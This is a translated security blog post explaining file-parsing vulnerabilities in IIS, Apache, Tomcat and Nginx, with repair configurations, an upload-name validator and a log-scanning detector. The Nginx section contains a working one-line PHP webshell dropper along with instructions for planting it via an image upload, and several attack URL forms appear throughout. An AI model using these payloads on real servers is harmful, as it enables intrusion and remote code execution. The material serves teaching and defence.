[network security] analysis vulnerability of website Middleware
2022-07-24 17:42:00 【Penguin jumping stairs】

Catalog
One. What a parsing vulnerability is
Two. Middleware commonly used by websites
Three. Middleware parsing vulnerabilities
Four. Summary
One. What a parsing vulnerability is
A parsing vulnerability is a flaw in middleware such as IIS, Apache or Nginx in which, under certain conditions, a file with a non-script extension is interpreted as a script file.
Put simply: the server restricts which file types it will parse as script, but the restriction has gaps, and exploiting a parsing vulnerability means bypassing those restrictions so that an arbitrary uploaded file gets executed.
Two. Middleware commonly used by websites
1. IIS
IIS (Internet Information Services) is the middleware provided by Microsoft for the Windows platform. It mainly parses three file formats: .ASP, .ASA and .CER. In real upload environments .ASP files are usually blacklisted, so uploads in the .ASA and .CER formats are sometimes tried instead, occasionally with unexpected results.

2. APACHE
Apache is the most widely used web server software in the world. It runs on almost every computer platform, and because of its cross-platform support and security it has become one of the most popular web server programs.

3. TOMCAT
Tomcat is a minimal web server implementing the Java EE standards. It is a core project of the Apache Software Foundation's Jakarta project, developed by Apache, Sun and other companies and individuals. Because of its advanced technology, stable performance and free open-source licence, it is popular with Java enthusiasts, has been endorsed by some software vendors, and has become a widely used web application server.

4. NGINX
Nginx is an open-source, high-performance, reliable HTTP server and proxy. It is characterised by low memory use and strong concurrency.

Three. Middleware parsing vulnerabilities
1. IIS parsing vulnerabilities
(1) IIS 5.x - 6.x parsing vulnerabilities
Servers running IIS 5.x-6.x are mostly Windows Server 2003; the sites are older and are usually written in ASP. This parsing vulnerability can only parse asp files, not aspx files.
Directory parsing (6.0)
Form: www.xxx.com/xx.asp/xx.jpg
Principle: by default the server parses every file inside a directory named .asp or .asa as an asp file.
File parsing
Form: www.xxx.com/xx.asp;.jpg
Principle: by default the server does not parse anything after the semicolon, so xx.asp;.jpg is interpreted as an asp file.
Parsed file types
Besides asp, IIS 6.0 executes three other extensions by default:
/test.asa
/test.cer
/test.cdx
(2) IIS 7.0 / IIS 7.5 / Nginx < 8.03 malformed parsing vulnerability
In Fast-CGI mode, IIS 7.0 / IIS 7.5 / Nginx < 8.03 interpret /xx.jpg/xx.php as a php file when /xx.php is appended to a file path (/xx.jpg).
On a vulnerable site, requesting http://127.0.0.1/1.jpg/1.php causes 1.jpg to be parsed as a PHP script even though 1.php does not exist.
This means an attacker can upload a legitimate-looking "picture" (an image containing a Trojan) and then append "/xxx.php" to the URL to obtain a WebShell on the site, which is then connected to with the "kitchen knife" webshell client.
Form: 1.jpg/1.php
(3) IIS 7.5 parsing vulnerability
The IIS 7.5 vulnerability is similar to the nginx one: both arise because cgi.fix_pathinfo is enabled in the php configuration file; it is not a flaw in nginx or iis 7.5 itself.
(4) Repair plan
1. Microsoft has not released an official patch, so write your own regular expression to block uploads of file names of the form xx.asp;.jpg.
2. Set permissions carefully and restrict users from creating folders.
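As an added example (not code from the original post), the following Python validator implements repair item 1 above for an upload endpoint: it rejects the file-name shapes discussed on this page (semicolon truncation, null bytes, path separators, a script extension hidden anywhere in a chain of suffixes) and otherwise accepts only an allow-listed image extension. The extension sets and the reason codes are assumptions chosen for this example.

```python
import re
from typing import Optional

# Allow-list of upload extensions (constructed for this example; adjust per application).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Extensions the middleware discussed above may execute as script. Includes the three
# IIS 6.0 alternatives to .asp (.asa, .cer, .cdx) and common PHP/JSP variants.
SCRIPT_EXTENSIONS = {"asp", "asa", "cer", "cdx", "aspx", "php", "php3", "php4",
                     "php5", "phtml", "jsp"}


def upload_name_problem(filename: str) -> Optional[str]:
    """Return None if the name is safe to store, else a short reason code.

    Each check corresponds to a parsing trick described on this page:
      - control/null bytes        -> 1.jpg%00.php style truncation
      - ';'                       -> IIS 6 file parsing (xx.asp;.jpg)
      - path separators           -> IIS 6 directory parsing (xx.asp/xx.jpg)
      - script suffix in chain    -> Apache right-to-left parsing (test.php.jpg)
      - final suffix not allowed  -> everything else
    """
    if re.search(r"[\x00-\x1f\x7f]", filename):
        return "control-or-null-byte"
    if ";" in filename:
        return "semicolon"
    if "/" in filename or "\\" in filename:
        return "path-separator"
    parts = filename.lower().split(".")
    # Require a non-empty base name and at least one non-empty suffix.
    if len(parts) < 2 or any(p == "" for p in parts):
        return "missing-name-or-extension"
    # Every suffix after the base name is checked, not only the last one, because
    # Apache walks the chain from the right until it finds a handler it knows.
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:]):
        return "script-extension"
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return "extension-not-allowed"
    return None


def accept_upload(filename: str) -> bool:
    """Convenience wrapper: True only when upload_name_problem() finds nothing."""
    return upload_name_problem(filename) is None
```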
2. APACHE parsing vulnerabilities
(1) APACHE configuration file vulnerability
Apache parses file names from right to left: if the rightmost suffix is one it cannot parse, it moves one suffix to the left. For example, in test.php.owf.rar the suffixes ".owf" and ".rar" are not recognised by apache, so apache interprets test.php.owf.rar as php.
Form of the vulnerability
www.xxxx.xxx.com/test.php.php123
① If the Apache conf contains a line such as AddHandler php5-script .php, then any file name containing .php, even test2.php.jpg, is executed as php.
② If the Apache conf contains a line such as AddType application/x-httpd-php .jpg, then even a file with the jpg extension is executed as php.
(2) Repair plan
① In the apache configuration file, forbid execution of .php.-style files by adding:
<Files ~ "\.(php\.|php3\.)">
Order Allow,Deny
Deny from all
</Files>
② Pseudo-static rewriting can also solve the problem by rewriting .php.* style files. Open apache's httpd.conf, find LoadModule rewrite_module modules/mod_rewrite.so,
remove the leading # and restart apache. Then create a .htaccess file in the website root with the following contents:
<IfModule mod_rewrite.c>
RewriteEngine On
# [NC] makes the match case-insensitive, so pHp, PHP, Php3 and so on are all covered
RewriteRule \.(php\.|php3\.) /index.php [NC]
</IfModule>
3. TOMCAT parsing vulnerabilities
(1) CVE-2020-1938 file inclusion vulnerability
Description
The vulnerability is caused by a defect in Tomcat's AJP protocol. By constructing specific parameters, an attacker can read any file under the server's webapp directory, such as webapp configuration files or source code. If the target server also has a file upload function, the attacker can go further and achieve remote code execution.
Affected versions
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
Vulnerability analysis
Tomcat's handling of the ajp protocol is flawed: arbitrary request attributes can be set on Tomcat through request.setAttribute. As a result the Tomcat ajp protocol has both an arbitrary file read vulnerability in the web directory and a JSP file inclusion vulnerability.
When the ajp URI is set to a non-jsp path, Tomcat dispatches to DefaultServlet, which leads to the arbitrary file read in the web directory.
When the ajp URI is set to a jsp path, Tomcat dispatches to JspServlet, which leads to the JSP file inclusion vulnerability.
4. NGINX parsing vulnerabilities
Vulnerability principle
Nginx supports PHP parsing through CGI by default; the common practice is to set SCRIPT_FILENAME in the Nginx configuration file through a regular-expression match. When the URL www.xx.com/phpinfo.jpg/1.php is requested, $fastcgi_script_name is set to "phpinfo.jpg/1.php", which is then built into SCRIPT_FILENAME and passed to PHP CGI. Why does PHP accept such a parameter and parse phpinfo.jpg as a PHP file? The answer lies in the fix_pathinfo option (cgi.fix_pathinfo). When it is enabled, PHP applies the following logic:
PHP treats SCRIPT_FILENAME as phpinfo.jpg and 1.php as PATH_INFO, so it parses phpinfo.jpg as a PHP file.
Form of the vulnerability
www.xxxx.com/UploadFiles/image/1.jpg/1.php
www.xxxx.com/UploadFiles/image/1.jpg%00.php
www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
xxx.jpg%00.php (Nginx < 8.03 null byte code execution vulnerability)
Another method: upload a file named test.jpg with the following contents:
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
Then request test.jpg/.php, and a one-line Trojan shell.php is generated in that directory.
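As an added example, not part of the original post, the following Python script scans web-server access-log lines for the request shapes listed in the IIS, Apache and Nginx sections above, so that probing for these parsing vulnerabilities can be spotted in logs. The pattern names, the Common Log Format layout and the sample lines (using the 203.0.113.0/24 documentation range) are constructed for this example.

```python
import re
from urllib.parse import unquote
from typing import Dict, List

# Request-path shapes described on this page, keyed by a name used in findings.
PROBE_PATTERNS: Dict[str, re.Pattern] = {
    "iis-semicolon":  re.compile(r"\.(asp|asa|cer|cdx|aspx);", re.I),       # xx.asp;.jpg
    "iis-dir-parse":  re.compile(r"\.(asp|asa)/[^/?]+$", re.I),             # xx.asp/xx.jpg
    "pathinfo-split": re.compile(r"\.(jpe?g|png|gif)/[^/?]*\.php$", re.I),  # 1.jpg/1.php
    "null-byte":      re.compile(r"%00|\x00", re.I),                         # 1.jpg%00.php
    "apache-chain":   re.compile(r"\.php\d?\.[a-z0-9]+$", re.I),            # test.php.jpg
}

# Common Log Format line; the status is kept because a 200 on a probe is a stronger signal than a 404.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample log lines (203.0.113.0/24 is a documentation address range).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Jul/2022:17:42:00 +0800] "GET /images/logo.jpg HTTP/1.1" 200 4096',
    '203.0.113.7 - - [24/Jul/2022:17:42:01 +0800] "GET /xx.asp;.jpg HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Jul/2022:17:42:02 +0800] "GET /UploadFiles/image/1.jpg/1.php HTTP/1.1" 200 77',
    '203.0.113.7 - - [24/Jul/2022:17:42:03 +0800] "GET /UploadFiles/image/1.jpg%00.php HTTP/1.1" 404 169',
    '203.0.113.9 - - [24/Jul/2022:17:42:04 +0800] "GET /test.php.php123 HTTP/1.1" 200 33',
    '203.0.113.9 - - [24/Jul/2022:17:42:05 +0800] "GET /xx.asp/xx.jpg HTTP/1.1" 200 88',
]


def classify_path(path: str) -> List[str]:
    """Names of every probe pattern matching the path, checked both raw and URL-decoded."""
    target = path.split("?", 1)[0]          # the query string is irrelevant to parsing tricks
    decoded = unquote(target)
    return [name for name, rx in PROBE_PATTERNS.items()
            if rx.search(target) or rx.search(decoded)]


def scan_access_log(lines: List[str]) -> List[dict]:
    """Return one finding per log line whose request path matches a probe pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # skip lines that are not in Common Log Format
        hits = classify_path(m.group("path"))
        if hits:
            findings.append({"ip": m.group("ip"), "path": m.group("path"),
                             "status": int(m.group("status")), "hits": hits})
    return findings
```

Running scan_access_log(SAMPLE_LOG) flags five of the six sample lines; the 404 on the null-byte probe shows the request was rejected, while a 200 on a pathinfo-split request is worth investigating as a possible successful parse.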
Four. Summary
Every year middleware has vulnerabilities large and small, but vendors generally release patches and keep maintaining their products, so the harm is usually not very serious.